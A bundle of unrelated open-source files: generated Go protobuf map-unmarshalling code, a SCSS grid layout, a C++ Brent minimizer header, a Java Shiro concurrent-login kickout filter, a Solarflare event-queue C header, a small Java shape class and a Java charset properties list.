s := strings.Join([]string{`&FakeMapEntry{`,
`Key:` + fmt.Sprintf("%v", this.Key) + `,`,
`Value:` + fmt.Sprintf("%v", this.Value) + `,`,
`Other:` + fmt.Sprintf("%v", this.Other) + `,`,
`}`,
}, "")
return s
}
func valueToStringMap(v interface{}) string {
rv := reflect.ValueOf(v)
if rv.IsNil() {
return "nil"
}
pv := reflect.Indirect(rv).Interface()
return fmt.Sprintf("*%v", pv)
}
func (m *MapTest) Unmarshal(dAtA []byte) error {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
preIndex := iNdEx
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
fieldNum := int32(wire >> 3)
wireType := int(wire & 0x7)
if wireType == 4 {
return fmt.Errorf("proto: MapTest: wiretype end group for non-group")
}
if fieldNum <= 0 {
return fmt.Errorf("proto: MapTest: illegal tag %d (wire type %d)", fieldNum, wire)
}
switch fieldNum {
case 1:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field StrStr", wireType)
}
var msglen int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
msglen |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
if msglen < 0 {
return ErrInvalidLengthMap
}
postIndex := iNdEx + msglen
if postIndex > l {
return io.ErrUnexpectedEOF
}
if m.StrStr == nil {
m.StrStr = make(map[string]string)
}
var mapkey string
var mapvalue string
for iNdEx < postIndex {
entryPreIndex := iNdEx
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
fieldNum := int32(wire >> 3)
if fieldNum == 1 {
var stringLenmapkey uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLenmapkey |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLenmapkey := int(stringLenmapkey)
if intStringLenmapkey < 0 {
return ErrInvalidLengthMap
}
postStringIndexmapkey := iNdEx + intStringLenmapkey
if postStringIndexmapkey > l {
return io.ErrUnexpectedEOF
}
mapkey = string(dAtA[iNdEx:postStringIndexmapkey])
iNdEx = postStringIndexmapkey
} else if fieldNum == 2 {
var stringLenmapvalue uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLenmapvalue |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLenmapvalue := int(stringLenmapvalue)
if intStringLenmapvalue < 0 {
return ErrInvalidLengthMap
}
postStringIndexmapvalue := iNdEx + intStringLenmapvalue
if postStringIndexmapvalue > l {
return io.ErrUnexpectedEOF
}
mapvalue = string(dAtA[iNdEx:postStringIndexmapvalue])
iNdEx = postStringIndexmapvalue
} else {
iNdEx = entryPreIndex
skippy, err := skipMap(dAtA[iNdEx:])
if err != nil {
return err
}
if skippy < 0 {
return ErrInvalidLengthMap
}
if (iNdEx + skippy) > postIndex {
return io.ErrUnexpectedEOF
}
iNdEx += skippy
}
}
m.StrStr[mapkey] = mapvalue
iNdEx = postIndex
default:
iNdEx = preIndex
skippy, err := skipMap(dAtA[iNdEx:])
if err != nil {
return err
}
if skippy < 0 {
return ErrInvalidLengthMap
}
if (iNdEx + skippy) > l {
return io.ErrUnexpectedEOF
}
iNdEx += skippy
}
}
if iNdEx > l {
return io.ErrUnexpectedEOF
}
return nil
}
func (m *FakeMap) Unmarshal(dAtA []byte) error {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
preIndex := iNdEx
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
fieldNum := int32(wire >> 3)
wireType := int(wire & 0x7)
if wireType == 4 {
return fmt.Errorf("proto: FakeMap: wiretype end group for non-group")
}
if fieldNum <= 0 {
return fmt.Errorf("proto: FakeMap: illegal tag %d (wire type %d)", fieldNum, wire)
}
switch fieldNum {
case 1:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Entries", wireType)
}
var msglen int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
msglen |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
if msglen < 0 {
return ErrInvalidLengthMap
}
postIndex := iNdEx + msglen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Entries = append(m.Entries, &FakeMapEntry{})
if err := m.Entries[len(m.Entries)-1].Unmarshal(dAtA[iNdEx:postIndex]); err != nil {
return err
}
iNdEx = postIndex
default:
iNdEx = preIndex
skippy, err := skipMap(dAtA[iNdEx:])
if err != nil {
return err
}
if skippy < 0 {
return ErrInvalidLengthMap
}
if (iNdEx + skippy) > l {
return io.ErrUnexpectedEOF
}
iNdEx += skippy
}
}
if iNdEx > l {
return io.ErrUnexpectedEOF
}
return nil
}
func (m *FakeMapEntry) Unmarshal(dAtA []byte) error {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
preIndex := iNdEx
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
fieldNum := int32(wire >> 3)
wireType := int(wire & 0x7)
if wireType == 4 {
return fmt.Errorf("proto: FakeMapEntry: wiretype end group for non-group")
}
if fieldNum <= 0 {
return fmt.Errorf("proto: FakeMapEntry: illegal tag %d (wire type %d)", fieldNum, wire)
}
switch fieldNum {
case 1:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Key", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthMap
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Key = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 2:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Value", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthMap
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Value = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 3:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Other", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthMap
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Other = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
default:
iNdEx = preIndex
skippy, err := skipMap(dAtA[iNdEx:])
if err != nil {
return err
}
if skippy < 0 {
return ErrInvalidLengthMap
}
if (iNdEx + skippy) > l {
return io.ErrUnexpectedEOF
}
iNdEx += skippy
}
}
if iNdEx > l {
return io.ErrUnexpectedEOF
}
return nil
}
func skipMap(dAtA []byte) (n int, err error) {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowMap
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
wireType := int(wire & 0x7)
switch wireType {
case 0:
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowMap
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
iNdEx++
if dAtA[iNdEx-1] < 0x80 {
break
}
}
return iNdEx, nil
case 1:
iNdEx += 8
return iNdEx, nil
case 2:
var length int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowMap
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
length |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
iNdEx += length
if length < 0 {
return 0, ErrInvalidLengthMap
}
return iNdEx, nil
case 3:
for {
var innerWire uint64
var start int = iNdEx
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowMap
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
innerWire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
innerWireType := int(innerWire & 0x7)
if innerWireType == 4 {
break
}
next, err := skipMap(dAtA[start:])
if err != nil {
return 0, err
}
iNdEx = start + next
}
return iNdEx, nil
case 4:
return iNdEx, nil
case 5:
iNdEx += 4
return iNdEx, nil
default:
return 0, fmt.Errorf("proto: illegal wireType %d", wireType)
}
}
panic("unreachable")
}
var (
ErrInvalidLengthMap = fmt.Errorf("proto: negative length found during unmarshaling")
ErrIntOverflowMap = fmt.Errorf("proto: integer overflow")
)
func init() { proto.RegisterFile("combos/both/map.proto", fileDescriptorMap) }
var fileDescriptorMap = []byte{
// 310 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x8c, 0x90, 0xbf, 0x4f, 0xc2, 0x40,
0x14, 0xc7, 0xfb, 0x20, 0xd2, 0x78, 0x38, 0x98, 0x46, 0x93, 0xca, 0xf0, 0x42, 0x98, 0x58, 0x6c,
0x13, 0x59, 0xc4, 0xc1, 0xc1, 0xa8, 0x93, 0x2c, 0xe0, 0x6e, 0xae, 0x78, 0xfc, 0x08, 0x94, 0x6b,
0xee, 0x5e, 0x4d, 0x98, 0xe4, 0xcf, 0x71, 0x74, 0xf4, 0x4f, 0x60, 0x64, 0x74, 0xa4, 0xe7, 0xe2,
0xc8, 0xc8, 0x68, 0xb8, 0x62, 0x52, 0x37, 0xb7, 0xf7, 0xf9, 0xde, 0xe7, 0xee, 0x7d, 0x73, 0xec,
0xb4, 0x2f, 0xe3, 0x48, 0xea, 0x30, 0x92, 0x34, 0x0a, 0x63, 0x9e, 0x04, 0x89, 0x92, 0x24, 0xbd,
0x6a, 0xcc, 0x93, 0x67, 0x31, 0xe0, 0xe9, 0x94, 0x74, 0xed, 0x7c, 0x38, 0xa6, 0x51, 0x1a, 0x05,
0x7d, 0x19, 0x87, 0x43, 0x39, 0x94, 0xa1, 0x75, 0xa2, 0x74, 0x60, 0xc9, 0x82, 0x9d, 0xf2, 0xbb,
0x8d, 0x57, 0xe6, 0x76, 0x78, 0xf2, 0x28, 0x34, 0x79, 0x6d, 0xe6, 0x6a, 0x52, 0x4f, 0x9a, 0x94,
0x0f, 0xf5, 0x72, 0xb3, 0x7a, 0x51, 0x0f, 0x0a, 0x0f, 0x07, 0x7b, 0x2d, 0xe8, 0x91, 0xea, 0x91,
0xba, 0x9b, 0x91, 0x9a, 0x77, 0x2b, 0xda, 0x42, 0xad, 0xcd, 0xaa, 0x85, 0xd8, 0x3b, 0x66, 0xe5,
0x89, 0x98, 0xfb, 0x50, 0x87, 0xe6, 0x61, 0x77, 0x37, 0x7a, 0x27, 0xec, 0xe0, 0x85, 0x4f, 0x53,
0xe1, 0x97, 0x6c, 0x96, 0xc3, 0x55, 0xe9, 0x12, 0x1a, 0xd7, 0xcc, 0xbd, 0xe7, 0x13, 0xd1, 0xe1,
0x89, 0xd7, 0x62, 0xae, 0x98, 0x91, 0x1a, 0x0b, 0xbd, 0x2f, 0x70, 0xf6, 0xa7, 0xc0, 0x5e, 0xcb,
0x37, 0xff, 0x9a, 0x8d, 0x07, 0x76, 0x54, 0x3c, 0xf8, 0xef, 0xee, 0x5d, 0x2a, 0x69, 0x24, 0x94,
0x5f, 0xce, 0x53, 0x0b, 0x37, 0xb7, 0xcb, 0x0c, 0x9d, 0x55, 0x86, 0xce, 0x67, 0x86, 0xce, 0x3a,
0x43, 0xd8, 0x64, 0x08, 0xdb, 0x0c, 0x61, 0x61, 0x10, 0xde, 0x0c, 0xc2, 0xbb, 0x41, 0xf8, 0x30,
0x08, 0x4b, 0x83, 0xb0, 0x32, 0x08, 0x6b, 0x83, 0xf0, 0x6d, 0xd0, 0xd9, 0x18, 0x84, 0xad, 0x41,
0x67, 0xf1, 0x85, 0x4e, 0x54, 0xb1, 0x7f, 0xdb, 0xfa, 0x09, 0x00, 0x00, 0xff, 0xff, 0x11, 0xc9,
0x76, 0xfa, 0xb0, 0x01, 0x00, 0x00,
}
| {
"pile_set_name": "Github"
} |
// Variables
$size4-columns: 4 !default;
$size8-columns: 8 !default;
$size12-columns: 12 !default;
$size4-margin: 8px !default;
$size8-margin: 8px !default;
$size12-margin: 12px !default;
$size4-maxwidth: unset !default;
$size8-maxwidth: unset !default;
$size12-maxwidth: 1304px !default;
$size4-up-breakpoint: 599.99px !default;
$size8-up-breakpoint: 839.99px !default;
$size8-and-up: 'only screen and (min-width : #{$size4-up-breakpoint})' !default;
$size12-and-up: 'only screen and (min-width : #{$size8-up-breakpoint})' !default;
// TEMPORARILY ALL HAVE THE SAME GUTTER
$gutter-width: 12px !default;
// GRID
.container {
margin: 0 auto;
max-width: $size4-maxwidth;
padding: 0 $size4-margin;
box-sizing: border-box;
}
@media #{$size8-and-up} {
.container {
max-width: $size8-maxwidth;
padding: 0 $size8-margin;
}
}
@media #{$size12-and-up} {
.container {
max-width: $size12-maxwidth;
padding: 0 $size12-margin;
}
}
.col .row {
// margin-left: (-1 * $gutter-width / 2);
// margin-right: (-1 * $gutter-width / 2);
}
.section {
padding-top: 1rem;
padding-bottom: 1rem;
&.no-pad {
padding: 0;
}
&.no-pad-bot {
padding-bottom: 0;
}
&.no-pad-top {
padding-top: 0;
}
}
// Mixins to eliminate code repetition
@mixin reset-offset {
left: auto;
right: auto;
}
@mixin grid-classes($size, $i, $perc) {
&.offset-#{$size}#{$i} {
margin-left: $perc;
}
&.pull-#{$size}#{$i} {
right: $perc;
}
&.push-#{$size}#{$i} {
left: $perc;
}
[dir='rtl'] & {
&.offset-#{$size}#{$i} {
margin-right: $perc;
margin-left: auto;
}
&.pull-#{$size}#{$i} {
right: auto;
left: $perc;
}
&.push-#{$size}#{$i} {
left: auto;
right: $perc;
}
}
}
.row {
display: flex;
flex-wrap: wrap;
margin-left: auto;
margin-right: auto;
width: 100%;
// Clear floating children
&:after {
// content: '';
// display: table;
// clear: both;
}
.col {
display: flex;
flex-wrap: wrap;
float: left;
box-sizing: border-box;
padding: 0 $gutter-width / 2;
min-height: 1px;
&[class*='push-'],
&[class*='pull-'] {
position: relative;
}
$i: 1;
@while $i <= $size4-columns {
$perc: unquote((100 / ($size4-columns / $i)) + '%');
&.s#{$i} {
width: $perc;
@include reset-offset;
}
$i: $i + 1;
}
$i: 1;
@while $i <= $size4-columns {
$perc: unquote((100 / ($size4-columns / $i)) + '%');
@include grid-classes('s', $i, $perc);
$i: $i + 1;
}
.s-auto {
width: auto;
}
@media #{$size8-and-up} {
$i: 1;
@while $i <= $size8-columns {
$perc: unquote((100 / ($size8-columns / $i)) + '%');
&.m#{$i} {
width: $perc;
@include reset-offset;
}
$i: $i + 1;
}
$i: 1;
@while $i <= $size8-columns {
$perc: unquote((100 / ($size8-columns / $i)) + '%');
@include grid-classes('m', $i, $perc);
$i: $i + 1;
}
.m-auto {
width: auto;
}
}
@media #{$size12-and-up} {
$i: 1;
@while $i <= $size12-columns {
$perc: unquote((100 / ($size12-columns / $i)) + '%');
&.l#{$i} {
width: $perc;
@include reset-offset;
}
$i: $i + 1;
}
$i: 1;
@while $i <= $size12-columns {
$perc: unquote((100 / ($size12-columns / $i)) + '%');
@include grid-classes('l', $i, $perc);
$i: $i + 1;
}
.l-auto {
width: auto;
}
}
}
// This properties might be moved to work depending on the size
.col.no-gutters {
padding: 0;
}
.col.middle {
align-items: center;
}
.col.baseline {
align-items: baseline;
}
.col.horizontal-center {
justify-content: center;
}
.col.space-around {
justify-content: space-around;
}
}
.row.horizontal-center {
justify-content: center;
}
.row.baseline {
align-items: baseline;
}
.row.end {
align-items: flex-end;
}
.row.middle {
align-items: center;
}
.row.space-between {
justify-content: space-between;
}
.row.space-around {
justify-content: space-around;
}
.row.space-between {
justify-content: space-between;
}
.row.space-evenly {
justify-content: space-evenly;
}
.row.h-end {
justify-content: flex-end;
}
.row.h-baseline {
justify-content: baseline;
}
.no-wrap {
flex-wrap: nowrap;
}
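
// Usage sketch (illustrative only, not part of the framework): the rules above
// generate container > row > col layouts with width classes s1-s4, m1-m8 and
// l1-l12 (per the default column counts), plus offset-/push-/pull- variants and
// the row/col alignment helpers. The markup below is a hypothetical example:
//
//   <div class="container">
//     <div class="row middle">
//       <div class="col s4 m4 l6">main</div>
//       <div class="col s4 m4 l3 offset-l3">aside</div>
//     </div>
//   </div>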
| {
"pile_set_name": "Github"
} |
// This is core/vnl/algo/vnl_brent.h
#ifndef vnl_brent_h_
#define vnl_brent_h_
//:
// \file
// \author [email protected]
// \date 07 Dec 00
//
// \verbatim
// Modifications
// 31 May 2001 Ian Scott (Manchester). Added some documentation
// 31 May 2001 Ian Scott (Manchester). Added minimize_given_bounds_and_1st_f
// \endverbatim
#include <vnl/vnl_cost_function.h>
#include <vnl/algo/vnl_brent_minimizer.h>
#include <vnl/algo/vnl_algo_export.h>
//: Brent 1D minimizer (deprecated)
//
// Please use vnl_brent_minimizer instead.
//
// This routine used to contain copyrighted code, and is deprecated.
// It is now simply a wrapper around vnl_brent_minimizer.
class VNL_ALGO_EXPORT vnl_brent : public vnl_brent_minimizer
{
public:
vnl_brent(vnl_cost_function* functor);
~vnl_brent() override;
//: Find a minimum of f(x) near to ax.
double minimize(double ax);
//: Find the minimum value of f(x) within a<= x <= c.
// The minimum value is the return value, and *xmin the relevant value of x.
// You need to provide a bracket for the minimum
// Also returns fa = f(a), etc.
double minimize_given_bounds(double ax, double bx, double cx,
double tol,
double *xmin);
//: Save time over minimize_given_bounds() if you know f(b)
// This function avoids a single computation of f, if you already know
// it.
double minimize_given_bounds_and_1st_f(double ax, double bx, double fb,
double cx, double tol, double *xmin);
//: Given distinct points ax, and bx, find a bracket for the minimum.
// Return a bracket ax > bx > cx, f(b) < f(a), f(b) < f(c) for minimum.
// Also returns fa = f(a), etc.
//
// You should probably use vnl_bracket_minimum instead of this function.
void bracket_minimum(double *ax, double *bx, double *cx,
double *fa, double *fb, double *fc);
//: Given distinct points ax, and bx, find a bracket for the minimum.
// Return a bracket ax > bx > cx, f(b) < f(a), f(b) < f(c) for minimum.
//
// You should probably use vnl_bracket_minimum instead of this function.
void bracket_minimum(double *ax, double *bx, double *cx);
};
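
// Usage sketch (illustrative only): `my_cost_fn` is an assumed
// vnl_cost_function subclass whose f() evaluates the scalar function being
// minimised; only the vnl_brent calls below come from this header.
//
//   my_cost_fn f;
//   vnl_brent brent(&f);
//   double xmin;
//   double fmin = brent.minimize_given_bounds(0.0 /*ax*/, 1.0 /*bx*/, 2.0 /*cx*/,
//                                             1e-6 /*tol*/, &xmin);
//   // fmin is the minimum value found, xmin the corresponding x in [ax, cx].
//
// New code should use vnl_brent_minimizer directly, as noted above.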
#endif // vnl_brent_h_
| {
"pile_set_name": "Github"
} |
package com.dashuai.learning.shiro.filter;
import com.dashuai.learning.shiro.model.UserInfo;
import com.dashuai.learning.utils.json.JSONParseUtils;
import org.apache.shiro.cache.Cache;
import org.apache.shiro.cache.CacheManager;
import org.apache.shiro.session.Session;
import org.apache.shiro.session.mgt.DefaultSessionKey;
import org.apache.shiro.session.mgt.SessionManager;
import org.apache.shiro.subject.Subject;
import org.apache.shiro.web.filter.AccessControlFilter;
import org.apache.shiro.web.util.WebUtils;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import java.io.PrintWriter;
import java.io.Serializable;
import java.util.Deque;
import java.util.HashMap;
import java.util.LinkedList;
import java.util.Map;
/**
 * Approach:
 * 1. Read the current user's username and fetch the cached queue of sessionIds.
 * 2. When the queue grows beyond the maximum concurrent-login limit, pick a
 *    session according to the kickout rule, flag that session as kicked out,
 *    and update the cached queue.
 * 3. If the current session has been flagged as kicked out, log it out and then
 *    redirect to the kicked-out notice page.
*
* @author Liaozihong
*/
public class KickoutSessionControlFilter extends AccessControlFilter {
/**
     * URL to redirect to after a session is kicked out
*/
private String kickoutUrl;
/**
     * Whether to kick out the later login instead of the earlier one; by default the earlier login is kicked out
*/
private boolean kickoutAfter = false;
/**
     * Maximum number of concurrent logins allowed for the same account
*/
private int maxSession = 1;
private SessionManager sessionManager;
private Cache<String, Deque<Serializable>> cache;
/**
* Sets kickout url.
*
* @param kickoutUrl the kickout url
*/
public void setKickoutUrl(String kickoutUrl) {
this.kickoutUrl = kickoutUrl;
}
/**
* Sets kickout after.
*
* @param kickoutAfter the kickout after
*/
public void setKickoutAfter(boolean kickoutAfter) {
this.kickoutAfter = kickoutAfter;
}
/**
* Sets max session.
*
* @param maxSession the max session
*/
public void setMaxSession(int maxSession) {
this.maxSession = maxSession;
}
/**
* Sets session manager.
*
* @param sessionManager the session manager
*/
public void setSessionManager(SessionManager sessionManager) {
this.sessionManager = sessionManager;
}
/**
* Sets cache manager.
     * Looks up the "shiro_redis_cache" cache, i.e. the cache key prefix used by this filter
*
* @param cacheManager the cache manager
*/
public void setCacheManager(CacheManager cacheManager) {
this.cache = cacheManager.getCache("shiro_redis_cache");
}
@Override
protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
return false;
}
@Override
protected boolean onAccessDenied(ServletRequest request, ServletResponse response) throws Exception {
Subject subject = getSubject(request, response);
if (!subject.isAuthenticated() && !subject.isRemembered()) {
            // Not logged in: let the request continue through the rest of the filter chain
return true;
}
Session session = subject.getSession();
UserInfo user = (UserInfo) subject.getPrincipal();
String username = user.getUsername();
Serializable sessionId = session.getId();
        // Read the sessionId queue from the Redis cache
Deque<Serializable> deque = cache.get(username);
        // If the queue does not exist yet, create it
if (deque == null) {
deque = new LinkedList<>();
            // Push the sessionId onto the queue
deque.push(sessionId);
            // Cache the user's sessionId queue in Redis, keyed by username
cache.put(username, deque);
}
        // By default mark the current session as not kicked out (in this filter, true means "not kicked")
session.setAttribute("kickout", true);
        // If the queue does not contain this sessionId yet, push it and refresh the cache
if (!deque.contains(sessionId)) {
deque.push(sessionId);
cache.put(username, deque);
}
        // If the number of sessionIds in the queue exceeds the maximum, start evicting sessions
while (deque.size() > maxSession) {
Serializable kickoutSessionId = null;
            // If configured to kick out the later login
if (kickoutAfter) {
kickoutSessionId = deque.removeFirst();
            } else { // otherwise kick out the earlier login
kickoutSessionId = deque.removeLast();
}
            // Update the cached queue after the eviction
cache.put(username, deque);
try {
                // Look up the Session object for the evicted sessionId
Session kickoutSession = sessionManager.getSession(new DefaultSessionKey(kickoutSessionId));
if (kickoutSession != null) {
//设置会话的kickout属性表示踢出了
session.setAttribute("kickout", false);
}
} catch (Exception e) {//ignore exception
}
}
        // If this session has been kicked out, log it out and redirect to the kickout URL
if (!((Boolean) session.getAttribute("kickout"))) {
try {
                // Log the subject out
subject.logout();
} catch (Exception e) { //ignore
}
// saveRequest(request);
            // Check whether this is an Ajax request
if ("XMLHttpRequest".equalsIgnoreCase(((HttpServletRequest) request).getHeader("X-Requested-With"))) {
Map<String, String> resultMap = new HashMap<>();
resultMap.put("user_status", "300");
resultMap.put("message", "您已经在其他地方登录,请重新登录!");
                // Write the JSON response
response.setContentType("application/json;charset=UTF-8");
PrintWriter out = response.getWriter();
out.println(JSONParseUtils.object2JsonString(resultMap));
out.flush();
out.close();
return false;
} else {
                // Redirect to the kickout page
WebUtils.issueRedirect(request, response, kickoutUrl);
return false;
}
}
return true;
}
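
    /*
     * Registration sketch (illustrative only, not part of this class): the filter
     * is typically wired into Shiro's filter chain, for example via Spring's
     * ShiroFilterFactoryBean. The bean names and URLs below are assumptions.
     *
     *   KickoutSessionControlFilter kickout = new KickoutSessionControlFilter();
     *   kickout.setCacheManager(redisCacheManager);   // assumed CacheManager bean
     *   kickout.setSessionManager(sessionManager);    // assumed SessionManager bean
     *   kickout.setKickoutAfter(false);               // kick out the earlier login
     *   kickout.setMaxSession(1);
     *   kickout.setKickoutUrl("/login?kickout=1");    // assumed kickout page
     *
     *   shiroFilterFactoryBean.getFilters().put("kickout", kickout);
     *   // then reference "kickout" in the filter chain definition map.
     */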
} | {
"pile_set_name": "Github"
} |
/* SPDX-License-Identifier: BSD-3-Clause
*
* Copyright (c) 2016-2018 Solarflare Communications Inc.
* All rights reserved.
*
* This software was jointly developed between OKTET Labs (under contract
* for Solarflare) and Solarflare Communications, Inc.
*/
#ifndef _SFC_EV_H_
#define _SFC_EV_H_
#include <rte_ethdev_driver.h>
#include "efx.h"
#include "sfc.h"
#ifdef __cplusplus
extern "C" {
#endif
struct sfc_adapter;
struct sfc_dp_rxq;
struct sfc_dp_txq;
enum sfc_evq_state {
SFC_EVQ_UNINITIALIZED = 0,
SFC_EVQ_INITIALIZED,
SFC_EVQ_STARTING,
SFC_EVQ_STARTED,
SFC_EVQ_NSTATES
};
enum sfc_evq_type {
SFC_EVQ_TYPE_MGMT = 0,
SFC_EVQ_TYPE_RX,
SFC_EVQ_TYPE_TX,
SFC_EVQ_NTYPES
};
struct sfc_evq {
/* Used on datapath */
efx_evq_t *common;
const efx_ev_callbacks_t *callbacks;
unsigned int read_ptr;
unsigned int read_ptr_primed;
boolean_t exception;
efsys_mem_t mem;
struct sfc_dp_rxq *dp_rxq;
struct sfc_dp_txq *dp_txq;
/* Not used on datapath */
struct sfc_adapter *sa;
unsigned int evq_index;
enum sfc_evq_state init_state;
enum sfc_evq_type type;
unsigned int entries;
};
/*
 * The functions below define the mapping from event queue to transmit/receive
 * queue and vice versa.
* Own event queue is allocated for management, each Rx and each Tx queue.
* Zero event queue is used for management events.
* Rx event queues from 1 to RxQ number follow management event queue.
* Tx event queues follow Rx event queues.
*/
static inline unsigned int
sfc_evq_index_by_rxq_sw_index(__rte_unused struct sfc_adapter *sa,
unsigned int rxq_sw_index)
{
return 1 + rxq_sw_index;
}
static inline unsigned int
sfc_evq_index_by_txq_sw_index(struct sfc_adapter *sa, unsigned int txq_sw_index)
{
return 1 + sa->eth_dev->data->nb_rx_queues + txq_sw_index;
}
int sfc_ev_attach(struct sfc_adapter *sa);
void sfc_ev_detach(struct sfc_adapter *sa);
int sfc_ev_start(struct sfc_adapter *sa);
void sfc_ev_stop(struct sfc_adapter *sa);
int sfc_ev_qinit(struct sfc_adapter *sa,
enum sfc_evq_type type, unsigned int type_index,
unsigned int entries, int socket_id, struct sfc_evq **evqp);
void sfc_ev_qfini(struct sfc_evq *evq);
int sfc_ev_qstart(struct sfc_evq *evq, unsigned int hw_index);
void sfc_ev_qstop(struct sfc_evq *evq);
int sfc_ev_qprime(struct sfc_evq *evq);
void sfc_ev_qpoll(struct sfc_evq *evq);
void sfc_ev_mgmt_qpoll(struct sfc_adapter *sa);
#ifdef __cplusplus
}
#endif
#endif /* _SFC_EV_H_ */
| {
"pile_set_name": "Github"
} |
package com.coderings.dp.composite;
public class Line implements Shape {
@Override
public void draw() {
System.out.println("draw line");
}
}
| {
"pile_set_name": "Github"
} |
#
# Basic Encodings, available in all JDKs
#
# American Standard Code for Information Interchange
#
ASCII=true
# Windows Latin-1
#
Cp1252=true
#
# Latin alphabet No. 1
ISO-8859-1=true
#
# Latin alphabet No. 9, 'Euro' enabled
ISO-8859-15=true
#
# 8 Bit UCS Transformation Format
UTF-8=true
#
# 16 Bit UCS Transformation Format
UTF-16=true
#
# missing: UTF-16BE, UTF-16LE are no base need in EndUser environments
UTF-16BE=false
UTF-16LE=false
#
# extended encoding set, contained in lib/charsets.jar
# (International JDK only)
#
#Windows Eastern Europe
Cp1250=true
#Windows Russian (Cyrillic)
Cp1251=true
#Windows Greek
Cp1253=true
#Windows Turkish
Cp1254=true
#Windows Hebrew
Cp1255=true
#Windows Arabic
Cp1256=true
#Windows Baltic
Cp1257=true
#Windows Vietnamese
Cp1258=true
# Latin alphabet No. 2
ISO-8859-2=true
#Latin alphabet No. 3
ISO-8859-3=true
#Latin alphabet No. 4
ISO-8859-4=true
